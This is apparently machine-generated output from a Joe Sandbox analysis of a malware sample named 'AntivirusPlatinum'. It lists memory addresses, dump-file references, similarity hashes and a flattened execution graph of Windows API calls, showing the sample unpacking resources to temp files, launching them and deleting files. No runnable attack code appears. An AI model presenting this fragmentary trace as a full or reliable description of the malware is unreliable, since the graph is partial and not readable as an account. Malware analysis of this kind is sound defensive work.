                                                                                                                                                              0x0040bc99
                                                                                                                                                              0x0040bcad
                                                                                                                                                              0x0040bcb3
                                                                                                                                                              0x0040bcb5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bcb7
                                                                                                                                                              0x0040bcb7
                                                                                                                                                              0x0040bcba
                                                                                                                                                              0x0040bcbc
                                                                                                                                                              0x0040bcbc
                                                                                                                                                              0x0040bcb5
                                                                                                                                                              0x0040bcd6
                                                                                                                                                              0x0040bcd8
                                                                                                                                                              0x0040bcda
                                                                                                                                                              0x0040bcdf
                                                                                                                                                              0x0040bce0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bce0
                                                                                                                                                              0x0040bc69
                                                                                                                                                              0x0040bc69
                                                                                                                                                              0x0040bc6c
                                                                                                                                                              0x0040bc6f
                                                                                                                                                              0x0040bc74
                                                                                                                                                              0x0040bce5
                                                                                                                                                              0x0040bce5
                                                                                                                                                              0x0040bce5
                                                                                                                                                              0x0040bcf4

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DialogParamVisibleWindow
                                                                                                                                                              • String ID: GETPASSWORD1
                                                                                                                                                              • API String ID: 3157717868-3292211884
                                                                                                                                                              • Opcode ID: 0856605c94a204dc3c5ee9fad0e89998df4169891d6accadbc66455f57c12071
                                                                                                                                                              • Instruction ID: e13c2818cff99f58c8b25236b3b71f5baad7010d8761cbc8bff7993bfc24fc4f
                                                                                                                                                              • Opcode Fuzzy Hash: 0856605c94a204dc3c5ee9fad0e89998df4169891d6accadbc66455f57c12071
                                                                                                                                                              • Instruction Fuzzy Hash: 1D018232189355BBEB21DF609D4AAD77A54EA21314B14843FF880732C0D7B89CA097DE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:14.8%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:3.3%
                                                                                                                                                              Total number of Nodes:1210
                                                                                                                                                              Total number of Limit Nodes:4
                                                                                                                                                              execution_graph 2604 401000 memset GetModuleHandleA HeapCreate 2605 401044 2604->2605 2876 407470 HeapCreate RtlAllocateHeap 2605->2876 2607 401049 2877 406807 HeapCreate 2607->2877 2609 40104e 2878 406040 2609->2878 2617 401062 2896 40393b 2617->2896 2619 401067 2899 403694 7048DB20 CoInitialize 2619->2899 2621 40106c 2900 403ef0 RtlAllocateHeap 2621->2900 2629 4010bf GetUserDefaultLangID VerLanguageNameA CharLowerA 2913 403de0 2629->2913 2631 4010fc 2917 4030f0 2631->2917 2635 401113 2636 40112a 2635->2636 2637 4011ff 2635->2637 3047 403108 2636->3047 2638 403108 4 API calls 2637->2638 2640 40120f 2638->2640 2643 403108 4 API calls 2640->2643 2642 403108 4 API calls 2644 40114a 2642->2644 2645 40121f 2643->2645 2646 403108 4 API calls 2644->2646 2647 403108 4 API calls 2645->2647 2648 40115a 2646->2648 2649 40122f 2647->2649 2650 403108 4 API calls 2648->2650 2651 403108 4 API calls 2649->2651 2653 40116a 2650->2653 2652 40123f 2651->2652 2654 403108 4 API calls 2652->2654 2655 403108 4 API calls 2653->2655 2656 40124f 2654->2656 2657 40117a 2655->2657 2658 403108 4 API calls 2656->2658 2659 403108 4 API calls 2657->2659 2660 40125f 2658->2660 2661 40118a 2659->2661 2662 403108 4 API calls 2660->2662 2663 403108 4 API calls 2661->2663 2664 40126f 2662->2664 2665 40119a 2663->2665 2666 403108 4 API calls 2664->2666 2667 403108 4 API calls 2665->2667 2668 40127f 2666->2668 2669 4011aa 2667->2669 2670 403108 4 API calls 2668->2670 2671 403108 4 API calls 2669->2671 2672 40128f 2670->2672 2673 4011ba 2671->2673 2675 403108 4 API calls 2672->2675 2674 403108 4 API calls 2673->2674 2676 4011ca 2674->2676 2677 40129f 2675->2677 2678 403108 4 API calls 2676->2678 2679 403108 4 API calls 2677->2679 2680 4011da 2678->2680 2681 4012af 2679->2681 2682 403108 4 API calls 2680->2682 2683 403108 4 API calls 2681->2683 2685 4011ea 2682->2685 2684 4012bf 2683->2684 2686 403108 4 API calls 2684->2686 2687 403108 4 API calls 2685->2687 2688 4011fa 2686->2688 2687->2688 2921 403cd7 GetVersionExA 2688->2921 2691 4012f6 2926 403b70 2691->2926 2692 4012db 3050 4036a2 2692->3050 2695 401302 2932 403a66 2695->2932 2697 401ba4 ExitProcess HeapDestroy ExitProcess 2699 40138a 2936 4020b1 2699->2936 2702 4074f0 strlen RtlReAllocateHeap 2712 401325 2702->2712 2703 4013b5 2705 4036a2 16 API calls 2703->2705 2704 40139e 2943 401bdd 2704->2943 2707 4012f1 2705->2707 2707->2697 2709 4020b1 6 API calls 2711 4013e5 2709->2711 2713 4013e9 2711->2713 2714 40140f 2711->2714 2712->2699 2712->2702 2718 4030f0 2 API calls 2712->2718 3057 403a18 2712->3057 2715 403de0 RtlReAllocateHeap 2713->2715 2716 4036a2 16 API calls 2714->2716 2717 401401 2715->2717 2716->2707 2719 4030f0 2 API calls 2717->2719 2718->2712 2720 40140d 2719->2720 2721 4020b1 6 API calls 2720->2721 2722 40143f 2721->2722 2723 401463 2722->2723 2724 401443 2722->2724 2725 4036a2 16 API calls 2723->2725 2726 4020b1 6 API calls 2724->2726 2725->2707 2727 401493 2726->2727 2728 4020b1 6 API calls 2727->2728 2729 4014c5 2728->2729 2730 4020b1 6 API calls 2729->2730 2731 4014f7 2730->2731 2732 401756 2731->2732 3063 404de6 2731->3063 2734 403de0 RtlReAllocateHeap 2732->2734 2736 40176e 2734->2736 2738 4030f0 2 API calls 2736->2738 2740 40177a 2738->2740 2741 403de0 RtlReAllocateHeap 2740->2741 2743 401792 2741->2743 2745 4030f0 2 API calls 2743->2745 2747 40179e 2745->2747 2749 4020b1 6 API calls 2747->2749 2751 4017ae 2749->2751 2753 401a25 2751->2753 2755 403a18 3 API calls 2751->2755 2978 4074f0 2753->2978 2758 4017c7 2755->2758 2757 4015b5 2765 4015c5 _rmdir 2757->2765 2770 4015fc 2757->2770 2771 401645 2757->2771 3094 40505e 2757->3094 2761 403de0 RtlReAllocateHeap 2758->2761 2759 401a36 2762 4074f0 2 API calls 2759->2762 2763 4017e5 2761->2763 2764 401a40 2762->2764 2763->2753 2772 40181c 2763->2772 2766 4074f0 2 API calls 2764->2766 2765->2697 2767 401a4b 2766->2767 2768 4030f0 2 API calls 2767->2768 2769 401a57 2768->2769 2982 406170 2769->2982 3097 4045fc 2770->3097 2775 4045fc 4 API calls 2771->2775 3161 405dd5 2772->3161 2779 401656 2775->2779 2777 401a67 2781 401a87 2777->2781 2782 401a6b 2777->2782 2778 40160d 2783 4030f0 2 API calls 2778->2783 2784 4030f0 2 API calls 2779->2784 2780 40182f 3165 4036f8 2780->3165 2788 405ea0 DeleteFileA 2781->2788 2992 406250 2782->2992 2787 401619 2783->2787 2789 401662 2784->2789 3103 404925 2787->3103 2793 401a92 2788->2793 2794 404925 14 API calls 2789->2794 2790 40184a 2795 4030f0 2 API calls 2790->2795 2791 401a7b 2999 405fd0 2791->2999 2798 402025 6 API calls 2793->2798 2797 401623 2794->2797 2805 401856 2795->2805 2799 401678 2797->2799 2800 401a97 2798->2800 3120 406860 2799->3120 2801 4036a2 16 API calls 2800->2801 2802 401aad _rmdir 2801->2802 2802->2697 2803 401a85 2807 401adf 2803->2807 2811 402118 55 API calls 2803->2811 2804 4019c6 2808 403a79 4 API calls 2804->2808 2805->2804 2809 4074f0 2 API calls 2805->2809 2813 4074f0 2 API calls 2807->2813 2812 4019df 2808->2812 2814 40187a 2809->2814 2811->2807 2816 405e15 2 API calls 2812->2816 2817 401af6 2813->2817 2818 4030f0 2 API calls 2814->2818 2815 403de0 RtlReAllocateHeap 2819 4016b4 2815->2819 2820 4019f3 2816->2820 2821 4074f0 2 API calls 2817->2821 2829 401886 2818->2829 2824 4016fd 2819->2824 2825 4016cf 2819->2825 2822 405e90 SetCurrentDirectoryA 2820->2822 2823 401b01 2821->2823 2826 401a07 _rmdir 2822->2826 3007 402761 2823->3007 2831 4020b1 6 API calls 2824->2831 2830 4036a2 16 API calls 2825->2830 2826->2697 2828 4018a0 3234 406230 2828->3234 2829->2828 3187 402118 2829->3187 2835 4016e5 _rmdir 2830->2835 2836 40170d 2831->2836 2835->2697 3126 401d3f 2836->3126 2840 401998 2845 406170 7 API calls 2840->2845 2844 405fd0 5 API calls 2847 4018c2 2844->2847 2848 4019a8 2845->2848 2850 4074f0 2 API calls 2847->2850 2848->2804 2851 406250 6 API calls 2848->2851 2849 401b51 3038 405e15 2849->3038 2853 4018de 2850->2853 2854 4019bc 2851->2854 2856 4074f0 2 API calls 2853->2856 2857 405fd0 5 API calls 2854->2857 2859 4018e8 2856->2859 2857->2804 2861 4074f0 2 API calls 2859->2861 2862 4018f3 2861->2862 2863 4074f0 2 API calls 2862->2863 2864 4018fd 2863->2864 2865 4074f0 2 API calls 2864->2865 2866 401908 2865->2866 2867 4036a2 16 API calls 2866->2867 2868 401923 2867->2868 2868->2840 2869 401939 2868->2869 2870 403a79 4 API calls 2869->2870 2871 401952 2870->2871 2872 405e15 2 API calls 2871->2872 2873 401966 2872->2873 2874 405e90 SetCurrentDirectoryA 2873->2874 2875 40197a _rmdir 2874->2875 2875->2697 2876->2607 2877->2609 3237 4066f1 RtlAllocateHeap RtlAllocateHeap 2878->3237 2880 401053 2881 404ab3 2880->2881 3238 4066f1 RtlAllocateHeap RtlAllocateHeap 2881->3238 2883 404ac1 3239 406434 RtlAllocateHeap 2883->3239 2886 405082 2887 406434 RtlAllocateHeap 2886->2887 2888 401058 2887->2888 2889 4040e0 RtlInitializeCriticalSection GetStockObject 2888->2889 3241 4066f1 RtlAllocateHeap RtlAllocateHeap 2889->3241 2891 40410b 2892 406434 RtlAllocateHeap 2891->2892 2893 404121 memset 2892->2893 2894 40105d 2893->2894 2895 403d90 HeapCreate 2894->2895 2895->2617 2897 406434 RtlAllocateHeap 2896->2897 2898 403946 RtlInitializeCriticalSection 2897->2898 2898->2619 2899->2621 3242 40645c RtlAllocateHeap 2900->3242 2903 403060 2904 403065 2903->2904 2905 4010a6 2903->2905 2907 403087 HeapFree 2904->2907 3244 403128 2904->3244 2908 4030a0 RtlAllocateHeap 2905->2908 2907->2905 2909 4010b5 2908->2909 2910 403dc0 2909->2910 2911 403dc8 RtlAllocateHeap 2910->2911 2912 403dda 2910->2912 2911->2629 2912->2629 2914 403dea 2913->2914 3248 407750 2914->3248 2916 403df7 2916->2631 3251 407580 2917->3251 2919 401108 2920 403e30 HeapFree 2919->2920 2920->2635 2922 403cfe 2921->2922 2923 4012d4 2921->2923 2922->2923 2924 403d18 GetVersionExA 2922->2924 2923->2691 2923->2692 2924->2923 2925 403d32 2924->2925 2925->2923 2927 403b90 2926->2927 2928 403b98 2927->2928 2929 403bba SetUnhandledExceptionFilter 2927->2929 2930 403ba1 SetUnhandledExceptionFilter 2928->2930 2931 403bab SetUnhandledExceptionFilter 2928->2931 2929->2695 2930->2931 2931->2695 2933 403a71 2932->2933 3255 403957 2933->3255 3260 403100 2936->3260 2939 402102 3263 407550 2939->3263 2940 4020de LoadResource SizeofResource 2940->2939 2944 403dc0 RtlAllocateHeap 2943->2944 2945 401bed 2944->2945 3269 405eb2 2945->3269 2947 401bfc 2948 4030f0 2 API calls 2947->2948 2949 401c06 GetTempFileNameA 2948->2949 3276 403e50 2949->3276 2952 4030f0 2 API calls 2953 401c38 2952->2953 3282 403e30 HeapFree 2953->3282 2955 401c40 2956 405ea0 DeleteFileA 2955->2956 2957 401c4b 2956->2957 3283 405f13 2957->3283 2960 405dd5 2 API calls 2961 401c62 2960->2961 2962 4030f0 2 API calls 2961->2962 2963 401c6e 2962->2963 2964 401cc3 2963->2964 2965 4074f0 2 API calls 2963->2965 2970 401ce0 2963->2970 2966 4074f0 2 API calls 2964->2966 2967 401ca2 2965->2967 2968 401cd4 2966->2968 2969 4074f0 2 API calls 2967->2969 2971 4030f0 2 API calls 2968->2971 2972 401cad 2969->2972 2973 407550 HeapFree 2970->2973 2971->2970 2974 4074f0 2 API calls 2972->2974 2975 4013b3 2973->2975 2976 401cb7 2974->2976 2975->2709 2977 4030f0 2 API calls 2976->2977 2977->2964 2979 40751e 2978->2979 2980 4074ff strlen 2978->2980 2979->2759 2981 407750 RtlReAllocateHeap 2980->2981 2981->2979 3288 40662c 2982->3288 2985 4061c6 2987 406211 2985->2987 2988 4061ca RtlAllocateHeap 2985->2988 2986 4061ad CreateFileA 2986->2985 2986->2987 2990 406224 2987->2990 3294 4066bb 2987->3294 2989 4061ff 2988->2989 2989->2777 2990->2777 2993 406260 2992->2993 2994 406298 2992->2994 2993->2994 2995 4062a0 2993->2995 2997 406285 2993->2997 2994->2791 2995->2995 2996 4062a9 WriteFile 2995->2996 2996->2791 3305 406330 2997->3305 3000 406022 2999->3000 3001 405fda 2999->3001 3000->2803 3001->3000 3002 405ff3 3001->3002 3003 40600c CloseHandle 3001->3003 3004 405f90 WriteFile 3002->3004 3005 4066bb 2 API calls 3003->3005 3006 405ff9 HeapFree 3004->3006 3005->3000 3006->3003 3008 402768 3007->3008 3008->3008 3009 403100 2 API calls 3008->3009 3010 402781 3009->3010 3011 403100 2 API calls 3010->3011 3012 40278e 3011->3012 3013 403100 2 API calls 3012->3013 3014 40279b ShellExecuteEx 3013->3014 3015 4027e2 Sleep GetExitCodeProcess 3014->3015 3016 402801 3015->3016 3016->3015 3017 40280d 3016->3017 3018 407550 HeapFree 3017->3018 3019 402822 3018->3019 3020 407550 HeapFree 3019->3020 3021 40282b 3020->3021 3022 407550 HeapFree 3021->3022 3023 401b22 3022->3023 3024 402025 3023->3024 3025 401b2d 3024->3025 3026 402032 3024->3026 3030 405ea0 3025->3030 3026->3025 3028 40205d 3026->3028 3028->3026 3029 405ea0 DeleteFileA 3028->3029 3319 406960 3028->3319 3029->3028 3031 405ea7 DeleteFileA 3030->3031 3032 401b38 3030->3032 3031->3032 3033 403a79 3032->3033 3034 407750 RtlReAllocateHeap 3033->3034 3035 403a8b GetModuleFileNameA strcmp 3034->3035 3036 403aae memmove 3035->3036 3037 403ac2 3035->3037 3036->3037 3037->2849 3039 405e25 3038->3039 3040 407750 RtlReAllocateHeap 3039->3040 3041 405e62 3040->3041 3042 401b65 3041->3042 3043 405e76 strncpy 3041->3043 3044 405e90 3042->3044 3043->3042 3045 405e97 SetCurrentDirectoryA 3044->3045 3046 401b79 _rmdir 3044->3046 3045->3046 3046->2697 3327 407650 3047->3327 3049 40113a 3049->2642 3334 4038b5 3050->3334 3055 4038b5 12 API calls 3056 4036cb 3055->3056 3056->2707 3058 403a2b 3057->3058 3059 403957 GetCommandLineA 3058->3059 3060 403a40 3059->3060 3061 407750 RtlReAllocateHeap 3060->3061 3062 403a4e strncpy 3061->3062 3062->2712 3352 404b03 3063->3352 3065 401528 3066 4042bd 3065->3066 3376 4041cf 3066->3376 3069 4043ae 3070 4043bf 3069->3070 3071 404422 CreateWindowExA 3070->3071 3072 4043cf memset 3070->3072 3074 404472 3071->3074 3078 401574 3071->3078 3072->3071 3075 40662c 2 API calls 3074->3075 3076 404480 SetWindowLongA 3075->3076 3077 4047bb 4 API calls 3076->3077 3077->3078 3079 4045b3 3078->3079 3390 4044f0 3079->3390 3082 404e09 3084 404e23 3082->3084 3083 4015ab 3090 4045d3 3083->3090 3084->3083 3085 404eb2 RtlReAllocateHeap 3084->3085 3086 404e8f RtlAllocateHeap 3084->3086 3087 404ea1 3084->3087 3085->3087 3086->3087 3088 404f06 DestroyAcceleratorTable 3087->3088 3089 404f0d CreateAcceleratorTableA 3087->3089 3088->3089 3089->3083 3092 4045da 3090->3092 3091 4045f3 SetFocus 3093 4045f9 3091->3093 3092->3091 3092->3093 3093->2757 3400 404f24 3094->3400 3098 40460c 3097->3098 3099 404625 GetWindowTextLengthA 3098->3099 3102 40461c 3098->3102 3100 407750 RtlReAllocateHeap 3099->3100 3101 40463b GetWindowTextA strlen 3100->3101 3101->3102 3102->2778 3104 40493d 3103->3104 3105 404947 GetWindow 3104->3105 3106 404a0e 3104->3106 3107 404962 RemovePropA RemovePropA 3105->3107 3108 404955 3105->3108 3106->2797 3110 404980 RevokeDragDrop 3107->3110 3111 404988 3107->3111 3108->3107 3109 40495b SetActiveWindow 3108->3109 3109->3107 3110->3111 3112 4049a1 DestroyWindow sprintf UnregisterClassA 3111->3112 3113 40498f SendMessageA 3111->3113 3114 4049d3 3112->3114 3113->3114 3115 4049f2 3114->3115 3116 4049da HeapFree DestroyAcceleratorTable 3114->3116 3117 404a00 3115->3117 3118 4049f9 DeleteObject 3115->3118 3116->3115 3119 4066bb 2 API calls 3117->3119 3118->3117 3119->3106 3121 40686d 3120->3121 3426 4073b0 3121->3426 3123 406890 3124 407750 RtlReAllocateHeap 3123->3124 3125 401696 3124->3125 3125->2815 3127 401d47 3126->3127 3127->3127 3128 403100 2 API calls 3127->3128 3129 401d60 3128->3129 3429 403110 3129->3429 3132 4030a0 RtlAllocateHeap 3133 401d87 3132->3133 3134 403110 HeapFree 3133->3134 3135 401d9f 3134->3135 3136 4030a0 RtlAllocateHeap 3135->3136 3137 401dae 3136->3137 3138 403110 HeapFree 3137->3138 3139 401dc6 3138->3139 3140 4030a0 RtlAllocateHeap 3139->3140 3141 401dd5 3140->3141 3432 4024a8 3141->3432 3144 4024a8 5 API calls 3145 401df9 3144->3145 3146 4024a8 5 API calls 3145->3146 3148 401e0d 3146->3148 3147 401f91 3149 407550 HeapFree 3147->3149 3148->3147 3154 403dc0 RtlAllocateHeap 3148->3154 3158 401f5a _rmdir 3148->3158 3450 403ec0 3148->3450 3150 401fff 3149->3150 3151 403110 HeapFree 3150->3151 3152 402009 3151->3152 3153 403110 HeapFree 3152->3153 3155 402012 3153->3155 3154->3148 3156 403110 HeapFree 3155->3156 3157 40201b 3156->3157 3157->2732 3159 4036a2 16 API calls 3158->3159 3159->3148 3162 407750 RtlReAllocateHeap 3161->3162 3163 405de7 GetCurrentDirectoryA 3162->3163 3164 405df7 3163->3164 3164->2780 3166 40370d CoInitialize 3165->3166 3167 40371e memset LoadLibraryA 3165->3167 3166->3167 3168 403834 3167->3168 3169 403748 strncpy strlen 3167->3169 3171 407750 RtlReAllocateHeap 3168->3171 3172 40378d GetProcAddress 3169->3172 3173 40377f 3169->3173 3176 40383d 3171->3176 3174 40390d 3 API calls 3172->3174 3173->3172 3175 4037ac 3174->3175 3177 4038b5 12 API calls 3175->3177 3176->2790 3178 4037cd 3177->3178 3179 4038b5 12 API calls 3178->3179 3180 4037de 3179->3180 3181 4037e3 GetProcAddress 3180->3181 3182 403826 FreeLibrary 3180->3182 3183 407750 RtlReAllocateHeap 3181->3183 3182->3168 3182->3176 3184 4037f8 strlen 3183->3184 3184->3182 3186 40381e 3184->3186 3186->3182 3188 40211f 3187->3188 3188->3188 3189 403100 2 API calls 3188->3189 3190 402138 3189->3190 3191 405e90 SetCurrentDirectoryA 3190->3191 3195 40214b 3191->3195 3193 4030f0 RtlAllocateHeap RtlReAllocateHeap 3193->3195 3194 4074f0 2 API calls 3194->3195 3195->3193 3195->3194 3224 4021d2 3195->3224 3457 403220 3195->3457 3196 4023a3 3476 4035d0 3196->3476 3200 406230 9 API calls 3200->3224 3201 4023d9 3203 4074f0 2 API calls 3201->3203 3232 402470 3201->3232 3202 406170 7 API calls 3202->3224 3205 402415 3203->3205 3204 407550 HeapFree 3206 402485 3204->3206 3207 4074f0 2 API calls 3205->3207 3209 407550 HeapFree 3206->3209 3210 40241f 3207->3210 3211 40248e 3209->3211 3212 4074f0 2 API calls 3210->3212 3214 407550 HeapFree 3211->3214 3215 402428 3212->3215 3213 405fd0 WriteFile HeapFree CloseHandle memset HeapFree 3213->3224 3216 402497 3214->3216 3217 4074f0 2 API calls 3215->3217 3219 407550 HeapFree 3216->3219 3220 402432 3217->3220 3222 4024a0 3219->3222 3223 4074f0 2 API calls 3220->3223 3221 4074f0 strlen RtlReAllocateHeap 3221->3224 3222->2828 3225 40243d 3223->3225 3224->3196 3224->3200 3224->3202 3224->3213 3224->3221 3227 4030f0 RtlAllocateHeap RtlReAllocateHeap 3224->3227 3229 4036a2 16 API calls 3224->3229 3231 406960 5 API calls 3224->3231 3224->3232 3233 402025 6 API calls 3224->3233 3465 4062d0 3224->3465 3472 403fa3 3224->3472 3226 4036a2 16 API calls 3225->3226 3228 402458 3226->3228 3227->3224 3230 402025 6 API calls 3228->3230 3228->3232 3229->3224 3230->3232 3231->3224 3232->3204 3233->3224 3496 406060 3234->3496 3236 4018b0 3236->2840 3236->2844 3237->2880 3238->2883 3240 404ad4 LoadIconA LoadCursorA 3239->3240 3240->2886 3241->2891 3243 401087 3242->3243 3243->2903 3245 403188 3244->3245 3246 403139 3244->3246 3245->2904 3246->3245 3247 40316e HeapFree 3246->3247 3247->3246 3249 4077a2 3248->3249 3250 40776f RtlReAllocateHeap 3248->3250 3249->2916 3250->3249 3252 4075b3 RtlReAllocateHeap 3251->3252 3253 407597 RtlAllocateHeap 3251->3253 3254 4075d4 3252->3254 3253->3254 3254->2919 3259 40642d 3255->3259 3257 403969 GetCommandLineA 3258 401307 GetModuleHandleA 3257->3258 3258->2699 3258->2712 3259->3257 3266 407600 3260->3266 3262 4020c1 FindResourceA 3262->2939 3262->2940 3264 40755b HeapFree 3263->3264 3265 40139a 3263->3265 3264->3265 3265->2703 3265->2704 3267 40760a strlen RtlAllocateHeap 3266->3267 3268 407647 3266->3268 3267->3268 3268->3262 3270 407750 RtlReAllocateHeap 3269->3270 3271 405ec5 GetTempPathA LoadLibraryA 3270->3271 3272 405ee2 GetProcAddress 3271->3272 3275 405f00 3271->3275 3273 405ef2 GetLongPathNameA 3272->3273 3274 405ef9 FreeLibrary 3272->3274 3273->3274 3274->3275 3275->2947 3277 403e5d 3276->3277 3277->3277 3278 407750 RtlReAllocateHeap 3277->3278 3279 403e7a 3278->3279 3280 403e80 memcpy 3279->3280 3281 401c2c 3279->3281 3280->3281 3281->2952 3282->2955 3284 405f22 strncpy strlen 3283->3284 3285 401c56 3283->3285 3286 405f52 CreateDirectoryA 3284->3286 3285->2960 3286->3285 3289 406636 3288->3289 3290 40664d 3288->3290 3300 4067da RtlAllocateHeap 3289->3300 3292 406657 RtlReAllocateHeap 3290->3292 3293 406185 CreateFileA 3290->3293 3292->3293 3293->2985 3293->2986 3295 4066e2 3294->3295 3296 4066c7 3294->3296 3302 40681d 3295->3302 3296->3295 3297 4066cc memset 3296->3297 3299 4066ec 3297->3299 3299->2990 3301 4067f0 3300->3301 3301->3293 3303 40682e HeapFree 3302->3303 3303->3299 3306 406365 3305->3306 3307 406345 SetFilePointer 3305->3307 3308 406370 3306->3308 3309 4063de 3306->3309 3307->3306 3310 4063a3 3308->3310 3313 406389 memcpy 3308->3313 3316 405f90 3309->3316 3310->2994 3313->2994 3314 40640b memcpy 3314->2994 3315 4063eb WriteFile 3315->2994 3317 405fa1 WriteFile 3316->3317 3318 405fc5 3316->3318 3317->3318 3318->3314 3318->3315 3320 406973 CreateFileA 3319->3320 3321 406b14 3319->3321 3320->3321 3322 40699c RtlAllocateHeap 3320->3322 3321->3028 3323 406b0c CloseHandle 3322->3323 3325 4069be 3322->3325 3323->3321 3324 4069c0 ReadFile 3324->3325 3325->3324 3325->3325 3326 406afb HeapFree 3325->3326 3326->3323 3328 407661 strlen 3327->3328 3329 4076ca 3327->3329 3330 407694 RtlReAllocateHeap 3328->3330 3331 407678 RtlAllocateHeap 3328->3331 3332 4076d2 HeapFree 3329->3332 3333 4076b5 3329->3333 3330->3333 3331->3333 3332->3333 3333->3049 3335 4038bc EnumWindows 3334->3335 3338 4038cd 3334->3338 3336 4036aa 3335->3336 3344 40384e GetWindowThreadProcessId GetCurrentThreadId 3335->3344 3341 40390d GetForegroundWindow 3336->3341 3337 4038da GetCurrentThreadId 3337->3338 3339 4038e9 EnableWindow 3337->3339 3338->3336 3338->3337 3340 40681d HeapFree 3339->3340 3340->3338 3342 4036bb MessageBoxA 3341->3342 3343 40391e GetWindowThreadProcessId GetCurrentProcessId 3341->3343 3342->3055 3343->3342 3345 4038ac 3344->3345 3346 40386c IsWindowVisible 3344->3346 3346->3345 3347 403877 IsWindowEnabled 3346->3347 3347->3345 3348 403882 GetForegroundWindow 3347->3348 3348->3345 3349 40388c EnableWindow 3348->3349 3350 4067da RtlAllocateHeap 3349->3350 3351 4038a1 GetCurrentThreadId 3350->3351 3351->3345 3353 40662c 2 API calls 3352->3353 3355 404b24 sprintf 3353->3355 3356 404b55 3355->3356 3357 404b5c memset RegisterClassA 3355->3357 3356->3357 3358 404bb6 AdjustWindowRect 3357->3358 3360 404c25 3358->3360 3361 404c73 3360->3361 3362 404c3c GetSystemMetrics 3360->3362 3365 404cc9 CreateWindowExA 3361->3365 3366 404c89 GetWindowRect 3361->3366 3367 404c7f GetActiveWindow 3361->3367 3363 404c49 3362->3363 3364 404c4c GetSystemMetrics 3362->3364 3363->3364 3370 404c63 3364->3370 3368 404d01 SetPropA 3365->3368 3369 404dbc UnregisterClassA 3365->3369 3366->3370 3367->3365 3367->3366 3372 404d17 ShowWindow 3368->3372 3373 404d39 RtlAllocateHeap CreateAcceleratorTableA 3368->3373 3371 4066bb 2 API calls 3369->3371 3370->3365 3374 404daa 3371->3374 3372->3373 3373->3374 3374->3065 3377 4041e0 3376->3377 3378 4041f0 memset 3377->3378 3379 404243 CreateWindowExA 3377->3379 3378->3379 3381 404291 3379->3381 3382 40154c 3379->3382 3383 40662c 2 API calls 3381->3383 3382->3069 3384 40429f 3383->3384 3386 4047bb 3384->3386 3387 4047cd 3386->3387 3388 4047dc SetWindowLongA SetWindowLongA SetPropA SendMessageA 3387->3388 3389 40482d 3388->3389 3389->3382 3391 404502 3390->3391 3392 404514 memset 3391->3392 3393 40454b CreateWindowExA 3391->3393 3392->3393 3395 401597 3393->3395 3396 40458f 3393->3396 3395->3082 3397 40662c 2 API calls 3396->3397 3398 40459d 3397->3398 3399 4047bb 4 API calls 3398->3399 3399->3395 3401 404f38 3400->3401 3402 404f69 3401->3402 3403 404f50 HeapFree 3401->3403 3404 404f5a HeapFree 3401->3404 3405 404fa3 3402->3405 3406 404f74 HeapFree 3402->3406 3403->3404 3404->3402 3407 404ff3 GetMessageA 3405->3407 3408 404fac PeekMessageA 3405->3408 3417 404f9b 3406->3417 3409 404ffd GetActiveWindow 3407->3409 3408->3409 3410 404fbe 3408->3410 3418 405d3c GetKeyState 3409->3418 3412 404fca MsgWaitForMultipleObjects 3410->3412 3410->3417 3414 404fe2 PeekMessageA 3412->3414 3412->3417 3413 40500b 3415 40501f TranslateMessage DispatchMessageA 3413->3415 3416 40500f TranslateAccelerator 3413->3416 3414->3409 3414->3417 3415->3417 3416->3415 3416->3417 3417->2757 3419 405d50 GetKeyState 3418->3419 3420 405daa GetPropA 3418->3420 3419->3420 3421 405d58 GetKeyState 3419->3421 3422 405dbc 3420->3422 3421->3420 3423 405d60 GetKeyState 3421->3423 3422->3413 3423->3420 3424 405d68 GetFocus GetClassNameA _strncoll 3423->3424 3424->3420 3425 405d94 GetFocus SendMessageA 3424->3425 3425->3420 3425->3422 3427 4073c0 3426->3427 3428 407455 memset 3427->3428 3428->3123 3430 403115 HeapFree 3429->3430 3431 401d78 3429->3431 3430->3431 3431->3132 3433 4024b0 3432->3433 3433->3433 3434 403100 2 API calls 3433->3434 3435 4024c9 3434->3435 3436 403110 HeapFree 3435->3436 3437 4024e1 3436->3437 3438 4030a0 RtlAllocateHeap 3437->3438 3439 4024f0 3438->3439 3440 403110 HeapFree 3439->3440 3441 402508 3440->3441 3442 4030a0 RtlAllocateHeap 3441->3442 3443 402517 3442->3443 3444 407550 HeapFree 3443->3444 3445 402744 3444->3445 3446 403110 HeapFree 3445->3446 3447 40274e 3446->3447 3448 403110 HeapFree 3447->3448 3449 401de5 3448->3449 3449->3144 3451 403ec8 3450->3451 3452 403eeb 3450->3452 3453 403ed1 RtlReAllocateHeap 3451->3453 3454 403ee3 3451->3454 3452->3148 3453->3148 3455 403dc0 RtlAllocateHeap 3454->3455 3456 403ee8 3455->3456 3456->3148 3458 40322e 3457->3458 3459 403292 3458->3459 3461 403287 strncpy 3458->3461 3460 407750 RtlReAllocateHeap 3459->3460 3462 403299 3460->3462 3461->3459 3463 4032aa 3462->3463 3464 40329f strncpy 3462->3464 3463->3195 3464->3463 3466 406324 3465->3466 3467 4062e0 3465->3467 3466->3224 3467->3466 3468 406312 WriteFile 3467->3468 3469 406304 3467->3469 3468->3466 3470 406330 5 API calls 3469->3470 3471 40630c 3470->3471 3471->3224 3483 4064a1 3472->3483 3475 403fcd 3475->3224 3488 403440 3476->3488 3478 4023c5 3479 4035f0 